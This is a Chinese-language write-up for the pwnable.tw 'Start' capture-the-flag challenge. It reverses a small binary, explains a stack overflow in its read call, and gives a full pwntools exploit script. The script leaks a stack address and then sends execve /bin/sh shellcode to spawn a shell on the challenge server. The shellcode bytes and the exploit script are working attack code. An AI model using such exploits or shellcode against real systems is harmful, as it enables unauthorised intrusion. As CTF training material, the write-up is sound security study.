Pwnable.tw Start

参考了这篇writeup  http://dogewatch.github.io/2017/04/10/pwnable.tw-Part1/

拿到binary拖到ida里看一下,只有两个函数,一个_start,一个_exit。

直接通过 int 80h 进行系统调用

linux syscall的资料在这里

把这段汇编翻译成c

void_start(){

    charbuf[20]='Let'sstarttheCTF:';

    sys_write(1,buf,20);

    sys_read(0,buf,60);

}

void_exit(){

    sys_exit();

}

这里有个坑是用peda 的checksec显示NX是开启状态,但实际栈是可执行的

read有溢出,所以大概的思路是先泄露栈地址 然后往栈上写shellcode并执行

栈结构:

/  saved esp  /

/    ret addr    /

/                    /

20 bytes buffer

/                    /

发现当第一次ret后,esp正好指向saved esp 此时若跳转到mov ecx,esp处可以泄露

saved esp的值,接下来写shellcode 构造payload就行了 这里需要注意的是在第二次ret前

add esp 14h

因此payload要先填充20byte的字符

而且不知道为什么用pwntools生成的shellcode打过去没效果

利用脚本如下

from pwn import *

context.log_level="debug"

s= remote('chall.pwnable.tw',10000)

addr_1 = p32(0x08048087) # mov ecx, esp

shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

#0:  31 c9                  xor    ecx,ecx

#2:  f7 e1                  mul    ecx

#4:  51                      push  ecx

#5:  68 2f 2f 73 68          push  0x68732f2f

#a:  68 2f 62 69 6e          push  0x6e69622f

#f:  89 e3                  mov    ebx,esp

#11:  b0 0b                  mov    al,0xb

#13:  cd 80                  int    0x80

#shellcode = asm(shellcraft.i386.sh())

def leak():

    recv = s.recvuntil(':')

    payload = 'a'*20 + addr_1

     s.send(payload)

    stack_addr = s.recv(4)

    print 'stack address is : ' + hex(u32(stack_addr))

    return u32(stack_addr)

def pwn(addr):

    payload =  "a"*20+p32(addr+20)  + shellcode

    s.send(payload)


addr_2 = leak()

pwn(addr_2)

s.interactive()

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,491评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,856评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,745评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,196评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,073评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,112评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,531评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,215评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,485评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,578评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,356评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,215评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,583评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,898评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,174评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,497评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,697评论 2 335

推荐阅读更多精彩内容